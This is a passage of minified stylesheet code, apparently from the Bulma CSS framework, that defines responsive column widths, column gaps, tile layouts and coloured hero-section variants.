(max-width:1023px){.column.is-narrow-touch{flex:none}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{flex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width:1024px){.column.is-narrow-desktop{flex:none}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width:1216px){.column.is-narrow-widescreen{flex:none}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-offset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width:1408px){.column.is-narrow-fullhd{flex:none}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0}.column.is-1-fullhd{flex:none;width:8.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:calc(1.5rem - .75rem)}.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width:769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width:1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap:0.75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable .column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap:0rem}@media screen and (max-width:768px){.columns.is-variable.is-0-mobile{--columnGap:0rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-0-tablet{--columnGap:0rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-0-tablet-only{--columnGap:0rem}}@media screen and (max-width:1023px){.columns.is-variable.is-0-touch{--columnGap:0rem}}@media screen and (min-width:1024px){.columns.is-variable.is-0-desktop{--columnGap:0rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-0-desktop-only{--columnGap:0rem}}@media screen and (min-width:1216px){.columns.is-variable.is-0-widescreen{--columnGap:0rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-0-widescreen-only{--columnGap:0rem}}@media screen and (min-width:1408px){.columns.is-variable.is-0-fullhd{--columnGap:0rem}}.columns.is-variable.is-1{--columnGap:0.25rem}@media screen and (max-width:768px){.columns.is-variable.is-1-mobile{--columnGap:0.25rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-1-tablet{--columnGap:0.25rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-1-tablet-only{--columnGap:0.25rem}}@media screen and (max-width:1023px){.columns.is-variable.is-1-touch{--columnGap:0.25rem}}@media screen and (min-width:1024px){.columns.is-variable.is-1-desktop{--columnGap:0.25rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-1-desktop-only{--columnGap:0.25rem}}@media screen and (min-width:1216px){.columns.is-variable.is-1-widescreen{--columnGap:0.25rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-1-widescreen-only{--columnGap:0.25rem}}@media screen and (min-width:1408px){.columns.is-variable.is-1-fullhd{--columnGap:0.25rem}}.columns.is-variable.is-2{--columnGap:0.5rem}@media screen and (max-width:768px){.columns.is-variable.is-2-mobile{--columnGap:0.5rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-2-tablet{--columnGap:0.5rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-2-tablet-only{--columnGap:0.5rem}}@media screen and (max-width:1023px){.columns.is-variable.is-2-touch{--columnGap:0.5rem}}@media screen and (min-width:1024px){.columns.is-variable.is-2-desktop{--columnGap:0.5rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-2-desktop-only{--columnGap:0.5rem}}@media screen and (min-width:1216px){.columns.is-variable.is-2-widescreen{--columnGap:0.5rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-2-widescreen-only{--columnGap:0.5rem}}@media screen and (min-width:1408px){.columns.is-variable.is-2-fullhd{--columnGap:0.5rem}}.columns.is-variable.is-3{--columnGap:0.75rem}@media screen and (max-width:768px){.columns.is-variable.is-3-mobile{--columnGap:0.75rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-3-tablet{--columnGap:0.75rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-3-tablet-only{--columnGap:0.75rem}}@media screen and (max-width:1023px){.columns.is-variable.is-3-touch{--columnGap:0.75rem}}@media screen and (min-width:1024px){.columns.is-variable.is-3-desktop{--columnGap:0.75rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-3-desktop-only{--columnGap:0.75rem}}@media screen and (min-width:1216px){.columns.is-variable.is-3-widescreen{--columnGap:0.75rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-3-widescreen-only{--columnGap:0.75rem}}@media screen and (min-width:1408px){.columns.is-variable.is-3-fullhd{--columnGap:0.75rem}}.columns.is-variable.is-4{--columnGap:1rem}@media screen and (max-width:768px){.columns.is-variable.is-4-mobile{--columnGap:1rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-4-tablet{--columnGap:1rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-4-tablet-only{--columnGap:1rem}}@media screen and (max-width:1023px){.columns.is-variable.is-4-touch{--columnGap:1rem}}@media screen and (min-width:1024px){.columns.is-variable.is-4-desktop{--columnGap:1rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-4-desktop-only{--columnGap:1rem}}@media screen and (min-width:1216px){.columns.is-variable.is-4-widescreen{--columnGap:1rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-4-widescreen-only{--columnGap:1rem}}@media screen and (min-width:1408px){.columns.is-variable.is-4-fullhd{--columnGap:1rem}}.columns.is-variable.is-5{--columnGap:1.25rem}@media screen and (max-width:768px){.columns.is-variable.is-5-mobile{--columnGap:1.25rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-5-tablet{--columnGap:1.25rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-5-tablet-only{--columnGap:1.25rem}}@media screen and (max-width:1023px){.columns.is-variable.is-5-touch{--columnGap:1.25rem}}@media screen and (min-width:1024px){.columns.is-variable.is-5-desktop{--columnGap:1.25rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-5-desktop-only{--columnGap:1.25rem}}@media screen and (min-width:1216px){.columns.is-variable.is-5-widescreen{--columnGap:1.25rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-5-widescreen-only{--columnGap:1.25rem}}@media screen and (min-width:1408px){.columns.is-variable.is-5-fullhd{--columnGap:1.25rem}}.columns.is-variable.is-6{--columnGap:1.5rem}@media screen and (max-width:768px){.columns.is-variable.is-6-mobile{--columnGap:1.5rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-6-tablet{--columnGap:1.5rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-6-tablet-only{--columnGap:1.5rem}}@media screen and (max-width:1023px){.columns.is-variable.is-6-touch{--columnGap:1.5rem}}@media screen and (min-width:1024px){.columns.is-variable.is-6-desktop{--columnGap:1.5rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-6-desktop-only{--columnGap:1.5rem}}@media screen and (min-width:1216px){.columns.is-variable.is-6-widescreen{--columnGap:1.5rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-6-widescreen-only{--columnGap:1.5rem}}@media screen and (min-width:1408px){.columns.is-variable.is-6-fullhd{--columnGap:1.5rem}}.columns.is-variable.is-7{--columnGap:1.75rem}@media screen and (max-width:768px){.columns.is-variable.is-7-mobile{--columnGap:1.75rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-7-tablet{--columnGap:1.75rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-7-tablet-only{--columnGap:1.75rem}}@media screen and (max-width:1023px){.columns.is-variable.is-7-touch{--columnGap:1.75rem}}@media screen and (min-width:1024px){.columns.is-variable.is-7-desktop{--columnGap:1.75rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-7-desktop-only{--columnGap:1.75rem}}@media screen and (min-width:1216px){.columns.is-variable.is-7-widescreen{--columnGap:1.75rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-7-widescreen-only{--columnGap:1.75rem}}@media screen and (min-width:1408px){.columns.is-variable.is-7-fullhd{--columnGap:1.75rem}}.columns.is-variable.is-8{--columnGap:2rem}@media screen and (max-width:768px){.columns.is-variable.is-8-mobile{--columnGap:2rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-8-tablet{--columnGap:2rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-8-tablet-only{--columnGap:2rem}}@media screen and (max-width:1023px){.columns.is-variable.is-8-touch{--columnGap:2rem}}@media screen and (min-width:1024px){.columns.is-variable.is-8-desktop{--columnGap:2rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-8-desktop-only{--columnGap:2rem}}@media screen and (min-width:1216px){.columns.is-variable.is-8-widescreen{--columnGap:2rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-8-widescreen-only{--columnGap:2rem}}@media screen and (min-width:1408px){.columns.is-variable.is-8-fullhd{--columnGap:2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and (min-width:769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.hero{align-items:stretch;display:flex;flex-direction:column;justify-content:space-between}.hero .navbar{background:0 0}.hero .tabs ul{border-bottom:none}.hero.is-white{background-color:#fff;color:#0a0a0a}.hero.is-white a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-white strong{color:inherit}.hero.is-white .title{color:#0a0a0a}.hero.is-white .subtitle{color:rgba(10,10,10,.9)}.hero.is-white .subtitle a:not(.button),.hero.is-white .subtitle strong{color:#0a0a0a}@media screen and (max-width:1023px){.hero.is-white .navbar-menu{background-color:#fff}}.hero.is-white .navbar-item,.hero.is-white .navbar-link{color:rgba(10,10,10,.7)}.hero.is-white .navbar-link.is-active,.hero.is-white .navbar-link:hover,.hero.is-white a.navbar-item.is-active,.hero.is-white a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.hero.is-white .tabs a{color:#0a0a0a;opacity:.9}.hero.is-white .tabs a:hover{opacity:1}.hero.is-white .tabs li.is-active a{opacity:1}.hero.is-white .tabs.is-boxed a,.hero.is-white .tabs.is-toggle a{color:#0a0a0a}.hero.is-white .tabs.is-boxed a:hover,.hero.is-white .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-white .tabs.is-boxed li.is-active a,.hero.is-white .tabs.is-boxed li.is-active a:hover,.hero.is-white .tabs.is-toggle li.is-active a,.hero.is-white .tabs.is-toggle li.is-active a:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.hero.is-white.is-bold{background-image:linear-gradient(141deg,#e6e6e6 0,#fff 71%,#fff 100%)}@media screen and (max-width:768px){.hero.is-white.is-bold .navbar-menu{background-image:linear-gradient(141deg,#e6e6e6 0,#fff 71%,#fff 100%)}}.hero.is-black{background-color:#0a0a0a;color:#fff}.hero.is-black a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-black strong{color:inherit}.hero.is-black .title{color:#fff}.hero.is-black .subtitle{color:rgba(255,255,255,.9)}.hero.is-black .subtitle a:not(.button),.hero.is-black .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-black .navbar-menu{background-color:#0a0a0a}}.hero.is-black .navbar-item,.hero.is-black .navbar-link{color:rgba(255,255,255,.7)}.hero.is-black .navbar-link.is-active,.hero.is-black .navbar-link:hover,.hero.is-black a.navbar-item.is-active,.hero.is-black a.navbar-item:hover{background-color:#000;color:#fff}.hero.is-black .tabs a{color:#fff;opacity:.9}.hero.is-black .tabs a:hover{opacity:1}.hero.is-black .tabs li.is-active a{opacity:1}.hero.is-black .tabs.is-boxed a,.hero.is-black .tabs.is-toggle a{color:#fff}.hero.is-black .tabs.is-boxed a:hover,.hero.is-black .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-black .tabs.is-boxed li.is-active a,.hero.is-black .tabs.is-boxed li.is-active a:hover,.hero.is-black .tabs.is-toggle li.is-active a,.hero.is-black .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.hero.is-black.is-bold{background-image:linear-gradient(141deg,#000 0,#0a0a0a 71%,#181616 100%)}@media screen and (max-width:768px){.hero.is-black.is-bold .navbar-menu{background-image:linear-gradient(141deg,#000 0,#0a0a0a 71%,#181616 100%)}}.hero.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.hero.is-light a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-light strong{color:inherit}.hero.is-light .title{color:rgba(0,0,0,.7)}.hero.is-light .subtitle{color:rgba(0,0,0,.9)}.hero.is-light .subtitle a:not(.button),.hero.is-light .subtitle strong{color:rgba(0,0,0,.7)}@media screen and (max-width:1023px){.hero.is-light .navbar-menu{background-color:#f5f5f5}}.hero.is-light .navbar-item,.hero.is-light .navbar-link{color:rgba(0,0,0,.7)}.hero.is-light .navbar-link.is-active,.hero.is-light .navbar-link:hover,.hero.is-light a.navbar-item.is-active,.hero.is-light a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.hero.is-light .tabs a{color:rgba(0,0,0,.7);opacity:.9}.hero.is-light .tabs a:hover{opacity:1}.hero.is-light .tabs li.is-active a{opacity:1}.hero.is-light .tabs.is-boxed a,.hero.is-light .tabs.is-toggle a{color:rgba(0,0,0,.7)}.hero.is-light .tabs.is-boxed a:hover,.hero.is-light .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-light .tabs.is-boxed li.is-active a,.hero.is-light .tabs.is-boxed li.is-active a:hover,.hero.is-light .tabs.is-toggle li.is-active a,.hero.is-light .tabs.is-toggle li.is-active a:hover{background-color:rgba(0,0,0,.7);border-color:rgba(0,0,0,.7);color:#f5f5f5}.hero.is-light.is-bold{background-image:linear-gradient(141deg,#dfd8d9 0,#f5f5f5 71%,#fff 100%)}@media screen and (max-width:768px){.hero.is-light.is-bold .navbar-menu{background-image:linear-gradient(141deg,#dfd8d9 0,#f5f5f5 71%,#fff 100%)}}.hero.is-dark{background-color:#363636;color:#fff}.hero.is-dark a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-dark strong{color:inherit}.hero.is-dark .title{color:#fff}.hero.is-dark .subtitle{color:rgba(255,255,255,.9)}.hero.is-dark .subtitle a:not(.button),.hero.is-dark .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-dark .navbar-menu{background-color:#363636}}.hero.is-dark .navbar-item,.hero.is-dark .navbar-link{color:rgba(255,255,255,.7)}.hero.is-dark .navbar-link.is-active,.hero.is-dark .navbar-link:hover,.hero.is-dark a.navbar-item.is-active,.hero.is-dark a.navbar-item:hover{background-color:#292929;color:#fff}.hero.is-dark .tabs a{color:#fff;opacity:.9}.hero.is-dark .tabs a:hover{opacity:1}.hero.is-dark .tabs li.is-active a{opacity:1}.hero.is-dark .tabs.is-boxed a,.hero.is-dark .tabs.is-toggle a{color:#fff}.hero.is-dark .tabs.is-boxed a:hover,.hero.is-dark .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-dark .tabs.is-boxed li.is-active a,.hero.is-dark .tabs.is-boxed li.is-active a:hover,.hero.is-dark .tabs.is-toggle li.is-active a,.hero.is-dark .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#363636}.hero.is-dark.is-bold{background-image:linear-gradient(141deg,#1f191a 0,#363636 71%,#46403f 100%)}@media screen and (max-width:768px){.hero.is-dark.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1f191a 0,#363636 71%,#46403f 100%)}}.hero.is-primary{background-color:#00d1b2;color:#fff}.hero.is-primary a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-primary strong{color:inherit}.hero.is-primary .title{color:#fff}.hero.is-primary .subtitle{color:rgba(255,255,255,.9)}.hero.is-primary .subtitle a:not(.button),.hero.is-primary .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-primary .navbar-menu{background-color:#00d1b2}}.hero.is-primary .navbar-item,.hero.is-primary .navbar-link{color:rgba(255,255,255,.7)}.hero.is-primary .navbar-link.is-active,.hero.is-primary .navbar-link:hover,.hero.is-primary a.navbar-item.is-active,.hero.is-primary a.navbar-item:hover{background-color:#00b89c;color:#fff}.hero.is-primary .tabs a{color:#fff;opacity:.9}.hero.is-primary .tabs a:hover{opacity:1}.hero.is-primary .tabs li.is-active a{opacity:1}.hero.is-primary .tabs.is-boxed a,.hero.is-primary .tabs.is-toggle a{color:#fff}.hero.is-primary .tabs.is-boxed a:hover,.hero.is-primary .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-primary .tabs.is-boxed li.is-active a,.hero.is-primary .tabs.is-boxed li.is-active a:hover,.hero.is-primary .tabs.is-toggle li.is-active a,.hero.is-primary .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#00d1b2}.hero.is-primary.is-bold{background-image:linear-gradient(141deg,#009e6c 0,#00d1b2 71%,#00e7eb 100%)}@media screen and (max-width:768px){.hero.is-primary.is-bold .navbar-menu{background-image:linear-gradient(141deg,#009e6c 0,#00d1b2 71%,#00e7eb 100%)}}.hero.is-link{background-color:#3273dc;color:#fff}.hero.is-link a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-link strong{color:inherit}.hero.is-link .title{color:#fff}.hero.is-link .subtitle{color:rgba(255,255,255,.9)}.hero.is-link .subtitle a:not(.button),.hero.is-link .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-link .navbar-menu{background-color:#3273dc}}.hero.is-link .navbar-item,.hero.is-link .navbar-link{color:rgba(255,255,255,.7)}.hero.is-link .navbar-link.is-active,.hero.is-link .navbar-link:hover,.hero.is-link a.navbar-item.is-active,.hero.is-link a.navbar-item:hover{background-color:#2366d1;color:#fff}.hero.is-link .tabs a{color:#fff;opacity:.9}.hero.is-link .tabs a:hover{opacity:1}.hero.is-link .tabs li.is-active a{opacity:1}.hero.is-link .tabs.is-boxed a,.hero.is-link .tabs.is-toggle a{color:#fff}.hero.is-link .tabs.is-boxed a:hover,.hero.is-link .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-link .tabs.is-boxed li.is-active a,.hero.is-link .tabs.is-boxed li.is-active a:hover,.hero.is-link .tabs.is-toggle li.is-active a,.hero.is-link .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3273dc}.hero.is-link.is-bold{background-image:linear-gradient(141deg,#1577c6 0,#3273dc 71%,#4366e5 100%)}@media screen and (max-width:768px){.hero.is-link.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1577c6 0,#3273dc 71%,#4366e5 100%)}}.hero.is-info{background-color:#3298dc;color:#fff}.hero.is-info a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-info strong{color:inherit}.hero.is-info .title{color:#fff}.hero.is-info .subtitle{color:rgba(255,255,255,.9)}.hero.is-info .subtitle a:not(.button),.hero.is-info .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-info .navbar-menu{background-color:#3298dc}}.hero.is-info .navbar-item,.hero.is-info .navbar-link{color:rgba(255,255,255,.7)}.hero.is-info .navbar-link.is-active,.hero.is-info .navbar-link:hover,.hero.is-info a.navbar-item.is-active,.hero.is-info a.navbar-item:hover{background-color:#238cd1;color:#fff}.hero.is-info .tabs a{color:#fff;opacity:.9}.hero.is-info .tabs a:hover{opacity:1}.hero.is-info .tabs li.is-active a{opacity:1}.hero.is-info .tabs.is-boxed a,.hero.is-info .tabs.is-toggle a{color:#fff}.hero.is-info .tabs.is-boxed a:hover,.hero.is-info .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-info .tabs.is-boxed li.is-active a,.hero.is-info .tabs.is-boxed li.is-active a:hover,.hero.is-info 